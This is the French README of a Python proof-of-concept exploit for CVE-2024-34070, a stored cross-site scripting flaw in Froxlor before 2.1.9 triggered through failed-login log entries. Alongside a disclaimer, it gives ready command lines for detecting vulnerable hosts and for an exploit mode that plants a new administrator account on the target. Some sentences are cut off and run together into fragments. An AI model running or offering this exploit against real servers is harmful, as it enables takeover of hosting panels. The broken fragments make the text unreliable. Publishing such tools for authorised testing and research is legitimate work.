
Preuve de concept d'exploit pour CVE-2024-34070, une XSS stockée dans Froxlor. Détecte les instances vulnérables, extrait la version et injecte une charge utile pour créer un compte administrateur.
Preuve de concept Python pour CVE-2024-34070, un problème XSS stocké dans Froxlor antérieur à 2.1.9 via les tentatives de connexion échouées écrites dans le journal système.
Ce projet est destiné uniquement aux tests de sécurité autorisés, aux laboratoires CTF et à un usage éducatif. N'exécutez pas cela contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de tester. Le mode exploit peut créer un compte administrateur sur l'instance Froxlor cible.
< 2.1.9).Détection non authentifiée :
python3 main.py --url http://240.0.0.1:8080 --check
Détection authentifiée, utilisée pour récupérer la version exacte de Froxlor :
python3 main.py --url http://240.0.0.1:8080 --check --login admin --password 'password'
Mode exploit, création d'un nouvel administrateur :
python3 main.py --url http://240.0.0.1:8080 --exploit \
--new-admin abcd \
--new-password 'Abcd@@1234' \
--new-email [email protected]
Si un administrateur ou un bot d'automatisation lit les journaux système de Froxlor, l'étape de vérification devrait éventuellement rediriger vers admin_index.php.
--check peut confirmer Froxlor mais ne peut pas déterminer strictement la vulnérabilité./admin_admins.php) afin de fonctionner contre l'instance cible plutôt qu'un domaine codé en dur.